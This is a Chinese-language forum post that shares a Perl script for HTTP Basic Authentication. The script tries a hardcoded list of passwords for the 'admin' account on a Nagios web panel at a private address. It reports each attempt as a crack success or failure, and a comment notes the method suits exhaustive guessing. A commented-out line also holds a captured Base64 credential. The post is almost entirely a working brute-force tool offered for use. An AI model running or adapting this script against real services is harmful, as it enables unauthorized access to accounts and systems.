li26598296 发表于 2018-9-1 08:06:11

Perl脚本Basic Authentication方法

  Perl脚本Basic Authentication方法
  


[*]#!/usr/bin/perl
[*]
[*]use strict;
[*]use warnings;
[*]use HTTP::Request;
[*]use LWP::UserAgent;
[*]use Data::Dumper;
[*]use Getopt::Std;
[*]
[*]my %options = ();
[*]getopt("d:",\%options);
[*]
[*]my $debug = $options{d} || 0;
[*]
[*]my @password_array = qw(ken jack sunny ben kick);
[*]
[*]&main(@password_array);
[*]
[*]
[*]
[*]sub main {
[*]    foreach my $password (@_) {
[*]      my $status = &get_url($password);
[*]      if ($status == 1) {
[*]                last;
[*]      }
[*]    }
[*]}
[*]
[*]
[*]sub get_url {
[*]    my $password = shift;
[*]
[*]    my $ua;
[*]    my $req;
[*]    my $res;
[*]
[*]    my $url = 'http://192.168.4.40:8010/nagios';
[*]
[*]    $ua = LWP::UserAgent->new;
[*]    $ua->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/20070309 Firefox/2.0.0.3');
[*]    $ua->timeout(5);
[*]
[*]    $req = HTTP::Request->new( GET => $url );
[*]    #方法1:使用Firefox登陆这个Url输入用户密码时抓包,将密文抓下来。贴在下面
[*]    #$req->header("Authorization" => 'Basic bW9ua3R4cep1Y3dlYl9tb25pdG9y');
[*]    #方法2:可以直接输入用户名和密码,适合进行穷举时使用
[*]    $req->authorization_basic('admin', $password);
[*]
[*]    $res = $ua->request($req);
[*]    print "************************** content begin **************************\n" if $debug;
[*]    print $res->content . "\n" if $debug;
[*]    print "************************** content end **************************\n" if $debug;
[*]
[*]    print '*************************** Dumper $res ***************************' . "\n" if $debug;
[*]    print Dumper $res if $debug;
[*]    print '*************************** Dumper $res ***************************' . "\n" if $debug;
[*]
[*]    if ($res->is_success) {
[*]      print "crack success,password: " . $password . "\n";
[*]      return 1;
[*]    } else {
[*]      print "crack fail,password: " . $password . "\n";
[*]      return 0;
[*]    }
[*]}
  



页: [1]
查看完整版本: Perl脚本Basic Authentication方法